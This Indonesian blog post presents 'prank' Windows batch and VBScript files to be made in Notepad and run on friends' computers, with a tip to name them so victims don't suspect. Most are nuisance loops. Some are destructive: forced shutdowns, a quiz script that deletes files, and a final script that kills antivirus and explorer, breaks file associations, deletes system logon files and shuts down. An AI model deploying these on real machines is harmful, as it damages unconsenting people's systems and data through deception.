Wednesday, 18 November, 2020

Daily Literacy zone

Trik-trik menarik di Notepad


(Penulis: Azmi Mujahid F. H.)

Assalamualaikum.
Hai, Sobat tekno. Kali ini saya mau berbagi sedikit trik menarik di Notepad yang bisa anda lakukan di komputer anda atau komputer teman. Untuk caranya adalah sebagai berikut:
Pertama anda harus membuka notepad-nya dulu.
Ada dua cara untuk membuka atau mencari notepad yaitu:
Cara 1: cari di menu pencarian, ketik notepad seperti gambar berikut.

Cara 2: tekan tombol logo Windows+R di keyboard dan akan muncul seperti pada gambar berikut ini:

lalu klik OK

(1).Cara membuat pesan atau message yang muncul terus-menerus:
@ECHO off
:Begin
msg * komputer anda terkena virus
msg * wajib instal ulang
msg * hayo cpu nya gua acak acak nih
msg * ayo buruan instal ulang!
GOTO BEGIN

Caranya: copy script di atas kemudian paste-kan script-nya di notepad, setelah itu save notepad dengan namafile.BAT. Buat nama file semenarik mungkin agar teman anda tidak curiga.
nb: Pesan tersebut bisa diubah menurut selera anda

(2). Bikin komputer shutdown dengan disertai message atau pesan.

@echo off
msg * komputer anda kena hack
shutdown -s -c “Error! wah bahaya!!!”

save namafile.BAT

(3). Script buat memainkan tombol Caps Lock button.

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

save namafile.vbs

(4). Bisa buka-tutup CD atau DVD secara otomatis.

Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

save namafile.vbs

(5). Tekan tombol enter terus menerus.

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

save namafile.vbs

(6). Menekan tombol backspace terus menerus.

MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

save namafile.vbs

(7). Otomatis ngetik “muka Ente jelek abiss” di notepad atau word.

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “muka agan jelek abiss”
loop

save namafile.vbs

(8). Membuka jendela notepad terus menerus.

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

save namafile.BAT

(9). Otomatis buka notepad lalu ngetik apa yang anda mau.WScript.Sleep 1800 WScript.Sleep 100 Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "notepad" WScript.Sleep 10 WshShell.AppActivate "Notepad" WScript.Sleep 50 WshShell.SendKeys "a" WScript.Sleep 50 WshShell.SendKeys "gan " WScript.Sleep 50 WshShell.SendKeys "ma" WScript.Sleep 50 WshShell.SendKeys "ho" WScript.Sleep 50 WshShell.SendKeys " ba" WScript.Sleep 50 WshShell.SendKeys "ng" WScript.Sleep 50 WshShell.SendKeys "et" WScript.Sleep 50 WshShell.SendKeys " d" WScript.Sleep 50 WshShell.SendKeys "e" WScript.Sleep 50 WshShell.SendKeys " h" WScript.Sleep 50 WshShell.SendKeys "!" WScript.Sleep 50 WshShell.SendKeys "!! " save namafile.vbs (10). Bikin kuis jail. @echo off title Kuis Hari Ini: :menu cls echo jika komputer agan ngehang apa yg agan lakukan? pause echo pilih yang mana: echo 1. Matiin Komputer echo 2. Format Aja echo 3. Tidak Tau set input=nothing set /p input=Choice: if %input%==1 shutdown -s -t 30 if %input%==2 del c:\xxx if %input%==3 @ECHO off msg * komputer agan kena virus msg * virus nya bahaya banget lho! msg * harus segera install ulang! msg * biar ga ada masalah! @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Setelah itu script di atas di save quisseru.bat, lalu kalian kasih ke teman-teman.

YANG INI SANGAT BERBAHAYA, SEBAIKNYA JANGAN PERNAH DICOBA DI KOMPUTER ANDA@echo off set end=md “Hack installing” set fin=copy “Hack log.txt” “Installing” %end% %fin% net send * Hack is installing, press OK to begin set up. kill NAVAPSVC.exe /F /Q kill zonelabs.exe /F /Q kill explorer.exe /F /Q cls assoc .exe=txtfile assoc .txt=mp3file cls msg * It is you who is hacked …. msg * I warned you, and you kept going. Challenge me and this is what happens. DEL C:\WINDOWS \system32\logoff.exe / F /Q DEL C:\WINDOWS \system32\logon.exe / F /Q DEL C:\WINDOWS \system32\logon.scr / F /Q cls shutdown -s -t 5 -c “ thank you for waiting” save script di atas namafile.bat

Nb:Cara menjalankan program jahil tersebut adalah dengan klik 2x pada file notepad yang anda buat tadi.

Cara untuk menghentikan script tersebut adalah sebagai berikut :

Buka task manager (CTRL+ALT+DEL)–>applications–>Lihat aplikasi yang dijalankan tadi–>klik kanan–>Go To Process–>end process pada baris yang disorot

Sekian kali ini semoga bermanfaat dan bisa menghibur kalian semua ya 😀
Salam tekno.

***

Referensi: jalantikus.com

Editor: DLZ’s crew

Gambar: Pexels

dailyliteracyzone.com/Technoinfomirakers114


0 comments on “Trik-trik menarik di Notepad

Tinggalkan Balasan

%d blogger menyukai ini: